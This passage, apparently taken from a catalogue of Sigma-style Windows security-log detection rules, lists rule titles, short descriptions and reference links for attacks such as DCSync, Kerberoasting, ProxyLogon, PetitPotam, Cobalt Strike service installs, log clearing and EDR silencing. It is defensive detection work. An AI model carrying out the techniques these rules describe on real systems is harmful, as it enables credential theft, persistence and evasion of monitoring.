https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview |
Previously Installed IIS Module Was Removed |
Detects the removal of a previously installed IIS module. |
https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis, https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/, https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/, https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview |
Potential Active Directory Reconnaissance/Enumeration Via LDAP |
Detects potential Active Directory enumeration via LDAP |
https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726, https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1, https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs, https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c, https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427, https://ipurple.team/2024/07/15/sharphound-detection/ |
Standard User In High Privileged Group |
Detects logons of standard users that are members of highly privileged groups such as the Administrator group |
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers, https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection, https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml |
ProxyLogon MSExchange OabVirtualDirectory |
Detects specific patterns found after a successful ProxyLogon exploitation in relation to a cmdlet invocation of Set-OabVirtualDirectory |
https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c |
Mailbox Export to Exchange Webserver |
Detects a successful export of an Exchange mailbox to an untypical directory or with an aspx name suffix, which can be used to place a webshell, or the role assignment needed for it |
https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html |
Certificate Request Export to Exchange Webserver |
Detects a write of an Exchange CSR to an untypical directory or with an aspx name suffix, which can be used to place a webshell |
https://twitter.com/GossiTheDog/status/1429175908905127938 |
Remove Exported Mailbox from Exchange Webserver |
Detects removal of an exported Exchange mailbox, which could be an attempt to cover the tracks of a ProxyShell exploit |
https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430 |
Exchange Set OabVirtualDirectory ExternalUrl Property |
Rule to detect an adversary setting the OabVirtualDirectory ExternalUrl property to a script, as recorded in the Exchange Management log |
https://twitter.com/OTR_Community/status/1371053369071132675 |
MSExchange Transport Agent Installation - Builtin |
Detects the installation of an Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7 |
Failed MSExchange Transport Agent Installation |
Detects a failed installation of an Exchange Transport Agent |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8 |
NTLM Logon |
Detects logons using NTLM, which could be caused by a legacy source or attackers |
https://twitter.com/JohnLaTwC/status/1004895028995477505 |
NTLM Brute Force |
Detects common NTLM brute force device names |
https://www.varonis.com/blog/investigate-ntlm-brute-force |
Potential Remote Desktop Connection to Non-Domain Host |
Detects logons using NTLM to hosts that are potentially not part of the domain. |
n/a |
OpenSSH Server Listening On Socket |
Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket. |
https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH, https://winaero.com/enable-openssh-server-windows-10/, https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse, https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx, https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Azure AD Health Monitoring Agent Registry Keys Access |
This detection uses Windows security events to detect suspicious access attempts to the registry key of the Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. |
https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml |
Azure AD Health Service Agents Registry Keys Access |
This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g. AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys. |
https://o365blog.com/post/hybridhealthagent/, https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml |
Powerview Add-DomainObjectAcl DCSync AD Extend Right |
Detects the backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account using the Powerview\Add-DomainObjectAcl cmdlet with the DCSync extended right, which allows re-obtaining the password hashes of any user or computer |
https://twitter.com/menasec1/status/1111556090137903104, https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf |
AD Privileged Users or Groups Reconnaissance |
Detects reconnaissance of privileged users or groups based on event ID 4661 and known privileged user or group SIDs |
https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html |
ADCS Certificate Template Configuration Vulnerability |
Detects certificate creation with a template that allows a risky permission on the subject |
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf |
ADCS Certificate Template Configuration Vulnerability with Risky EKU |
Detects certificate creation with a template that allows a risky permission on the subject and a risky EKU |
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf |
Add or Remove Computer from DC |
Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN. |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743 |
Access To ADMIN$ Network Share |
Detects access to ADMIN$ network share |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140 |
AD Object WriteDAC Access |
Detects WRITE_DAC access to a domain object |
https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html |
Active Directory Replication from Non Machine Account |
Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. |
https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html, https://threathunterplaybook.com/library/windows/active_directory_replication.html, https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html |
Potential AD User Enumeration From Non-Machine Account |
Detects read access to a domain user from a non-machine account |
https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf, http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html, https://learn.microsoft.com/en-us/windows/win32/adschema/attributes-all, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662 |
Enabled User Right in AD to Control User Objects |
Detects a scenario where a user is assigned the SeEnableDelegationPrivilege right in Active Directory, which would allow control of other AD user objects. |
https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ |
Active Directory User Backdoors |
Detects scenarios where one can control another user's or computer's account without having to use their credentials. |
https://msdn.microsoft.com/en-us/library/cc220234.aspx, https://adsecurity.org/?p=3466, https://blog.harmj0y.net/redteaming/another-word-on-delegation/ |
Weak Encryption Enabled and Kerberoast |
Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking. |
https://adsecurity.org/?p=2053, https://blog.harmj0y.net/redteaming/another-word-on-delegation/ |
Hacktool Ruler |
Detects events that are generated when using the hacktool Ruler by SensePost |
https://github.com/sensepost/ruler, https://github.com/sensepost/ruler/issues/47, https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624 |
Remote Task Creation via ATSVC Named Pipe |
Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe |
https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html |
Security Eventlog Cleared |
Detects when one of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution |
https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100, https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml |
Processes Accessing the Microphone and Webcam |
Detects potential adversaries accessing the microphone and webcam on an endpoint. |
https://twitter.com/duzvik/status/1269671601852813320, https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 |
Failed Code Integrity Checks |
Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281 |
CobaltStrike Service Installations - Security |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement |
https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
DCERPC SMB Spoolss Named Pipe |
Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the spooler service enabled. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608 |
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security |
Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Mimikatz DC Sync |
Detects Mimikatz DC sync security events |
https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662 |
Device Installation Blocked |
Detects an installation of a device that is forbidden by the system policy |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423 |
Windows Event Auditing Disabled |
Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one-off specific GPO modifications; however, it is recommended to perform these modifications in Active Directory anyway. |
https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit |
Important Windows Event Auditing Disabled |
Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. |
https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit, https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md |
ETW Logging Disabled In .NET Processes - Registry |
Potential adversaries stopping ETW providers recording loaded .NET assemblies. |
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
DPAPI Domain Backup Key Extraction |
Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
DPAPI Domain Master Key Backup Attempt |
Detects anyone attempting a backup of the DPAPI Master Key. This event gets generated at the source and not on the Domain Controller. |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
External Disk Drive Or USB Storage Device Was Recognized By The System |
Detects external disk drives or plugged-in USB devices. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416 |
Persistence and Execution at Scale via GPO Scheduled Task |
Detects lateral movement using a GPO scheduled task, usually used to deploy ransomware at scale |
https://twitter.com/menasec1/status/1106899890377052160, https://www.secureworks.com/blog/ransomware-as-a-distraction, https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html |
Hidden Local User Creation |
Detects the creation of a local hidden user account which should not happen for event ID 4720. |
https://twitter.com/SBousseaden/status/1387743867663958021 |
HackTool - EDRSilencer Execution - Filter Added |
Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
|
https://github.com/netero1010/EDRSilencer |
HackTool - NoFilter Execution |
Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation, via hardcoded policy name indicators.
|
https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp, https://github.com/deepinstinct/NoFilter, https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation, https://x.com/_st0pp3r_/status/1742203752361128162?s=20 |
HybridConnectionManager Service Installation |
Rule to detect the Hybrid Connection Manager service installation. |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Impacket PsExec Execution |
Detects execution of Impacket's psexec.py. |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Possible Impacket SecretDump Remote Activity |
Detects AD credential dumping using the Impacket secretsdump hacktool |
https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html |
Invoke-Obfuscation CLIP+ Launcher - Security |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - Security |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - Security |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - Security |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - Security |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - Security |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - Security |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - Security |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - Security |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - Security |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
ISO Image Mounted |
Detects the mount of an ISO image on an endpoint |
https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages, https://twitter.com/MsftSecIntel/status/1257324139515269121, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image |
Kerberoasting Activity - Initial Query |
This rule will collect the data needed to start looking into possible kerberoasting activity.
Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.
You can then set a threshold for the number of requests and time between the requests to turn this into an alert.
|
https://www.trustedsec.com/blog/art_of_kerberoast/, https://adsecurity.org/?p=3513 |
First Time Seen Remote Named Pipe |
This detection excludes known named pipes accessible remotely and notifies on newly observed ones, which may help to detect lateral movement and remote execution using named pipes |
https://twitter.com/menasec1/status/1104489274387451904 |
LSASS Access From Non System Account |
Detects potential Mimikatz-like tools accessing LSASS from a non-system account |
https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html |
Credential Dumping Tools Service Execution - Security |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
WCE wceaux.dll Access |
Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Metasploit SMB Authentication |
Alerts on Metasploit host's authentications on the domain. |
https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb |
Metasploit Or Impacket Service Installation Via SMB PsExec |
Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation |
https://bczyz1.github.io/2021/01/30/psexec.html |
Meterpreter or Cobalt Strike Getsystem Service Installation - Security |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
NetNTLM Downgrade Attack |
Detects NetNTLM downgrade attack |
https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks |
Windows Network Access Suspicious desktop.ini Action |
Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. |
https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ |
New or Renamed User Account with '$' Character |
Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
|
https://twitter.com/SBousseaden/status/1387743867663958021 |
Denied Access To Remote Desktop |
This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.
Often, this event can be generated by attackers when searching for available Windows servers in the network.
|
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825 |
Password Policy Enumerated |
Detects when the password policy is enumerated. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661, https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951 |
Windows Pcap Drivers |
Detects Windows Pcap driver installation based on a list of associated .sys files. |
https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more |
Possible PetitPotam Coerce Authentication Attempt |
Detect PetitPotam coerced authentication activity. |
https://github.com/topotam/PetitPotam, https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml |
PetitPotam Suspicious Kerberos TGT Request |
Detects suspicious Kerberos TGT requests.
Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.
One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.
This request will generate a 4768 event with some unusual fields depending on the environment.
This analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts.
|
https://github.com/topotam/PetitPotam, https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/, https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml |
Possible DC Shadow Attack |
Detects DCShadow via the creation of a new SPN |
https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48 |
PowerShell Scripts Installed as Services - Security |
Detects a PowerShell script installed as a service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Protected Storage Service Access |
Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers |
https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html |
RDP over Reverse SSH Tunnel WFP |
Detects svchost hosting RDP termsvcs communicating with the loopback address |
https://twitter.com/SBousseaden/status/1096148422984384514, https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx |
Register new Logon Process by Rubeus |
Detects potential use of Rubeus via a newly registered trusted logon process |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 |
Service Registry Key Read Access Request |
Detects "read access" requests on the services registry key.
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
|
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness |
Remote PowerShell Sessions Network Connections (WinRM) |
Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986 |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Replay Attack Detected |
Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649 |
SAM Registry Hive Handle Request |
Detects handles requested to the SAM registry hive |
https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html |
SCM Database Handle Failure |
Detects non-system users failing to get a handle of the SCM database. |
https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html |
SCM Database Privileged Operation |
Detects non-system users performing privileged operations on the SCM database |
https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html |
Potential Secure Deletion with SDelete |
Detects files that have extensions commonly seen while SDelete is used to wipe files. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm, https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete |
Service Installed By Unusual Client - Security |
Detects a service installed by a client which has PID 0 or whose parent has PID 0 |
https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html, https://www.x86matthew.com/view_post?id=create_svc_rpc, https://twitter.com/SBousseaden/status/1490608838701166596 |
Remote Access Tool Services Have Been Installed - Security |
Detects service installation of various remote access tool software. These tools are often abused by threat actors to perform |
https://redcanary.com/blog/misbehaving-rats/ |
SMB Create Remote File Admin Share |
Looks for non-system accounts accessing a file over SMB with a write (0x2) access mask via an administrative share (e.g. C$). |
https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml, https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file |
A New Trust Was Created To A Domain |
Addition of domain trusts is rare and should be verified for legitimacy. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706 |
Win Susp Computer Name Containing Samtheadmin |
Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool |
https://twitter.com/malmoeb/status/1511760068743766026, https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py, https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py |
Addition of SID History to Active Directory Object |
An attacker can use the SID history attribute to gain additional privileges. |
https://adsecurity.org/?p=1772 |
Password Change on Directory Service Restore Mode (DSRM) Account |
Detects potential attempts made to set the Directory Services Restore Mode administrator password.
The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.
Attackers may change the password in order to obtain persistence.
|
https://adsecurity.org/?p=1714, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794 |
Account Tampering - Suspicious Failed Logon Reasons |
This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625, https://twitter.com/SBousseaden/status/1101431884540710913 |
Group Policy Abuse for Privilege Addition |
Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
|
https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275 |
Startup/Logon Script Added to Group Policy Object |
Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
|
https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html |
Kerberos Manipulation |
Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771 |
Suspicious LDAP-Attributes Used |
Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. |
https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger |
Suspicious Windows ANONYMOUS LOGON Local Account Created |
